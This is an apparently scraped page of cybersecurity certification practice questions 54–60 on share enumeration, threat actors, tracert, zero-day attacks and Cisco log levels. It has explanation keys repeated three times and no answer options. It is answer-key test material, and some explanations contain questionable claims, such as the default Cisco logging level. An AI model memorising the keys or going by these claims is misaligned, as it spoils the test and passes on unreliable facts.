Vendor Ref: –
Bugtraq ID: –
Service Modified – 8.30.2017
Enumeration Results:
print$ c:\windows\system32\spool\drivers
files c:\FileShare\Accounting
Temp c:\temp
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What best describes the meaning of this output?
Correct
OBJ-1.4: This results from the vulnerability scan conducted shows an enumeration of open Windows shares on an Apache server. The enumeration results show three share names (print$, files, Temp) were found using a null session connection. There is no associated CVE with this vulnerability, but it is not a false positive. Not all vulnerabilities have a CVE associated with them. Nothing in this output indicates anything concerning Windows Defender, so this is not the correct answer. Bugtraq IDs are a different type of identification number issued for vulnerabilities by SecurityFocus. Generally, if there is a CVE, there will also be a Bugtraq ID. Both the CVE and Bugtraq ID being blank is not suspicious since we are dealing with a null enumeration result.
Incorrect
OBJ-1.4: This results from the vulnerability scan conducted shows an enumeration of open Windows shares on an Apache server. The enumeration results show three share names (print$, files, Temp) were found using a null session connection. There is no associated CVE with this vulnerability, but it is not a false positive. Not all vulnerabilities have a CVE associated with them. Nothing in this output indicates anything concerning Windows Defender, so this is not the correct answer. Bugtraq IDs are a different type of identification number issued for vulnerabilities by SecurityFocus. Generally, if there is a CVE, there will also be a Bugtraq ID. Both the CVE and Bugtraq ID being blank is not suspicious since we are dealing with a null enumeration result.
Unattempted
OBJ-1.4: This results from the vulnerability scan conducted shows an enumeration of open Windows shares on an Apache server. The enumeration results show three share names (print$, files, Temp) were found using a null session connection. There is no associated CVE with this vulnerability, but it is not a false positive. Not all vulnerabilities have a CVE associated with them. Nothing in this output indicates anything concerning Windows Defender, so this is not the correct answer. Bugtraq IDs are a different type of identification number issued for vulnerabilities by SecurityFocus. Generally, if there is a CVE, there will also be a Bugtraq ID. Both the CVE and Bugtraq ID being blank is not suspicious since we are dealing with a null enumeration result.
Question 55 of 60
55. Question
Which of the following types of attackers are sophisticated and highly organized people or teams typically sponsored by a nation-state?
Correct
OBJ-1.1: Advanced Persistent Threat (APT) attackers are sophisticated and have access to financial and technical resources typically provided by a government. An APT is an attacker with the ability to obtain, maintain, and diversify access to network systems using exploits and malware. A hacktivist is an attacker that is motivated by a social issue or political cause. A script kiddie has little skill or sophistication and uses publicly available tools and techniques. An ethical hacker specializes in penetration testing and in other testing methodologies that ensure the security of an organization’s information systems. An ethical hacker is also known as a white hat hacker.
Incorrect
OBJ-1.1: Advanced Persistent Threat (APT) attackers are sophisticated and have access to financial and technical resources typically provided by a government. An APT is an attacker with the ability to obtain, maintain, and diversify access to network systems using exploits and malware. A hacktivist is an attacker that is motivated by a social issue or political cause. A script kiddie has little skill or sophistication and uses publicly available tools and techniques. An ethical hacker specializes in penetration testing and in other testing methodologies that ensure the security of an organization’s information systems. An ethical hacker is also known as a white hat hacker.
Unattempted
OBJ-1.1: Advanced Persistent Threat (APT) attackers are sophisticated and have access to financial and technical resources typically provided by a government. An APT is an attacker with the ability to obtain, maintain, and diversify access to network systems using exploits and malware. A hacktivist is an attacker that is motivated by a social issue or political cause. A script kiddie has little skill or sophistication and uses publicly available tools and techniques. An ethical hacker specializes in penetration testing and in other testing methodologies that ensure the security of an organization’s information systems. An ethical hacker is also known as a white hat hacker.
Question 56 of 60
56. Question
James is working with the software development team to integrate real-time security reviews into some of their SDLC processes. Which of the following would best meet this requirement?
Correct
OBJ-2.2: Pair programming is a real-time process that would meet this requirement. It utilizes two developers working on one workstation, where one developer reviews the code being written in real-time by the other developer. While the other three options can also provide a security review, none are considered “real-time” since they are asynchronous processes performed after the coding has already been completed.
Incorrect
OBJ-2.2: Pair programming is a real-time process that would meet this requirement. It utilizes two developers working on one workstation, where one developer reviews the code being written in real-time by the other developer. While the other three options can also provide a security review, none are considered “real-time” since they are asynchronous processes performed after the coding has already been completed.
Unattempted
OBJ-2.2: Pair programming is a real-time process that would meet this requirement. It utilizes two developers working on one workstation, where one developer reviews the code being written in real-time by the other developer. While the other three options can also provide a security review, none are considered “real-time” since they are asynchronous processes performed after the coding has already been completed.
Question 57 of 60
57. Question
You are troubleshooting a network connectivity issue and need to determine the packet’s flow path from your system to the remote server. Which of the following tools would best help you identify the path between the two systems?
Correct
OBJ-3.1: The TRACERT (trace route) diagnostic utility determines the route to a destination by sending Internet Control Message Protocol (ICMP) echo packets to the destination. In these packets, TRACERT uses varying IP Time-To-Live (TTL) values. When the TTL on a packet reaches zero (0), the router sends an ICMP “Time Exceeded” message back to the source computer. The ICMP “Time Exceeded” messages that intermediate routers send back show the route. The ipconfig tool displays all current TCP/IP network configuration values on a given system. The netstat tool is a command-line network utility that displays network connections for Transmission Control Protocol, routing tables, and some network interface and network protocol statistics on a single system. The nbtstat command is a diagnostic tool for NetBIOS over TCP/IP used to troubleshoot NetBIOS name resolution problems.
Incorrect
OBJ-3.1: The TRACERT (trace route) diagnostic utility determines the route to a destination by sending Internet Control Message Protocol (ICMP) echo packets to the destination. In these packets, TRACERT uses varying IP Time-To-Live (TTL) values. When the TTL on a packet reaches zero (0), the router sends an ICMP “Time Exceeded” message back to the source computer. The ICMP “Time Exceeded” messages that intermediate routers send back show the route. The ipconfig tool displays all current TCP/IP network configuration values on a given system. The netstat tool is a command-line network utility that displays network connections for Transmission Control Protocol, routing tables, and some network interface and network protocol statistics on a single system. The nbtstat command is a diagnostic tool for NetBIOS over TCP/IP used to troubleshoot NetBIOS name resolution problems.
Unattempted
OBJ-3.1: The TRACERT (trace route) diagnostic utility determines the route to a destination by sending Internet Control Message Protocol (ICMP) echo packets to the destination. In these packets, TRACERT uses varying IP Time-To-Live (TTL) values. When the TTL on a packet reaches zero (0), the router sends an ICMP “Time Exceeded” message back to the source computer. The ICMP “Time Exceeded” messages that intermediate routers send back show the route. The ipconfig tool displays all current TCP/IP network configuration values on a given system. The netstat tool is a command-line network utility that displays network connections for Transmission Control Protocol, routing tables, and some network interface and network protocol statistics on a single system. The nbtstat command is a diagnostic tool for NetBIOS over TCP/IP used to troubleshoot NetBIOS name resolution problems.
Question 58 of 60
58. Question
Which term refers to the consistent and tamper-resistant operation of every element within an enterprise?
Correct
OBJ-2.3: A trusted computing environment refers to every element’s consistent and tamper-resistant operation within an enterprise. The Trusted Foundry Program, also called the trusted suppliers program, is a United States Department of Defense program designed to secure the manufacturing infrastructure for information technology vendors providing hardware to the military. An accredited network means that a relevant system has been approved for use, and an authorizing official has accepted the risk involved. The term trust certified enterprise is not an industry-standard term and was created as a distractor from the correct answer.
Incorrect
OBJ-2.3: A trusted computing environment refers to every element’s consistent and tamper-resistant operation within an enterprise. The Trusted Foundry Program, also called the trusted suppliers program, is a United States Department of Defense program designed to secure the manufacturing infrastructure for information technology vendors providing hardware to the military. An accredited network means that a relevant system has been approved for use, and an authorizing official has accepted the risk involved. The term trust certified enterprise is not an industry-standard term and was created as a distractor from the correct answer.
Unattempted
OBJ-2.3: A trusted computing environment refers to every element’s consistent and tamper-resistant operation within an enterprise. The Trusted Foundry Program, also called the trusted suppliers program, is a United States Department of Defense program designed to secure the manufacturing infrastructure for information technology vendors providing hardware to the military. An accredited network means that a relevant system has been approved for use, and an authorizing official has accepted the risk involved. The term trust certified enterprise is not an industry-standard term and was created as a distractor from the correct answer.
Question 59 of 60
59. Question
A salesperson’s laptop has become unresponsive after attempting to open a PDF in their email. A cybersecurity analyst reviews the IDS and anti-virus software for any alerts or unusual behavior but finds nothing suspicious. Which of the following threats would BEST classify this scenario?
Correct
OBJ-3.1: Based on the scenario provided, it appears that the laptop has become the victim of a zero-day attack. A zero-day attack is an attack that exploits a potentially serious software security weakness that the vendor or developer may be unaware of. This means that there will not be a signature available in the IDS or anti-virus definition file. Therefore, it cannot be combatted with traditional signature-based detection methods. PII (personally identifiable information) exfiltration is the unauthorized copying, transfer, or retrieval of PII data from a computer or server. A ping of death is a type of attack on a computer system that involves sending a malformed or otherwise malicious ping to a computer. A remote access Trojan (RAT) is a malware program that includes a back door for administrative control over the target computer. Based on the scenario’s information, we do not have any indications that a ping packet was sent, that PII has been exfiltrated, or that the attack now has remote control of the laptop. Since neither the IDS nor anti-virus alerted on the PDF, it is most likely a form of a zero-day attack.
Incorrect
OBJ-3.1: Based on the scenario provided, it appears that the laptop has become the victim of a zero-day attack. A zero-day attack is an attack that exploits a potentially serious software security weakness that the vendor or developer may be unaware of. This means that there will not be a signature available in the IDS or anti-virus definition file. Therefore, it cannot be combatted with traditional signature-based detection methods. PII (personally identifiable information) exfiltration is the unauthorized copying, transfer, or retrieval of PII data from a computer or server. A ping of death is a type of attack on a computer system that involves sending a malformed or otherwise malicious ping to a computer. A remote access Trojan (RAT) is a malware program that includes a back door for administrative control over the target computer. Based on the scenario’s information, we do not have any indications that a ping packet was sent, that PII has been exfiltrated, or that the attack now has remote control of the laptop. Since neither the IDS nor anti-virus alerted on the PDF, it is most likely a form of a zero-day attack.
Unattempted
OBJ-3.1: Based on the scenario provided, it appears that the laptop has become the victim of a zero-day attack. A zero-day attack is an attack that exploits a potentially serious software security weakness that the vendor or developer may be unaware of. This means that there will not be a signature available in the IDS or anti-virus definition file. Therefore, it cannot be combatted with traditional signature-based detection methods. PII (personally identifiable information) exfiltration is the unauthorized copying, transfer, or retrieval of PII data from a computer or server. A ping of death is a type of attack on a computer system that involves sending a malformed or otherwise malicious ping to a computer. A remote access Trojan (RAT) is a malware program that includes a back door for administrative control over the target computer. Based on the scenario’s information, we do not have any indications that a ping packet was sent, that PII has been exfiltrated, or that the attack now has remote control of the laptop. Since neither the IDS nor anti-virus alerted on the PDF, it is most likely a form of a zero-day attack.
Question 60 of 60
60. Question
Which level of logging should you configure on a Cisco device to be notified whenever they shut down due to a failure?
Correct
OBJ-3.1: Cisco log levels range from 0 for emergencies to 7 for debugging. Level 0 is for emergencies, such as when the system is unusable (for example, a device shutting down due to failure). Level 1 is an alert where immediate action is needed. Level 2 is critical and is considered the default logging level. Level 3 is used for logging errors. Level 4 is used for logging warnings. Level 5 is used for logging notifications, which are normal but significant conditions. Level 6 is used for logging information messages only. Level 7 is used for logging debugging information. Any messages that would appear at or below the number will be logged. For example, setting logging to Level 7 would log everything listed above, but if you set logging to Level 1, it would only log emergency and alert conditions.
Incorrect
OBJ-3.1: Cisco log levels range from 0 for emergencies to 7 for debugging. Level 0 is for emergencies, such as when the system is unusable (for example, a device shutting down due to failure). Level 1 is an alert where immediate action is needed. Level 2 is critical and is considered the default logging level. Level 3 is used for logging errors. Level 4 is used for logging warnings. Level 5 is used for logging notifications, which are normal but significant conditions. Level 6 is used for logging information messages only. Level 7 is used for logging debugging information. Any messages that would appear at or below the number will be logged. For example, setting logging to Level 7 would log everything listed above, but if you set logging to Level 1, it would only log emergency and alert conditions.
Unattempted
OBJ-3.1: Cisco log levels range from 0 for emergencies to 7 for debugging. Level 0 is for emergencies, such as when the system is unusable (for example, a device shutting down due to failure). Level 1 is an alert where immediate action is needed. Level 2 is critical and is considered the default logging level. Level 3 is used for logging errors. Level 4 is used for logging warnings. Level 5 is used for logging notifications, which are normal but significant conditions. Level 6 is used for logging information messages only. Level 7 is used for logging debugging information. Any messages that would appear at or below the number will be logged. For example, setting logging to Level 7 would log everything listed above, but if you set logging to Level 1, it would only log emergency and alert conditions.
X
Use Page numbers below to navigate to other practice tests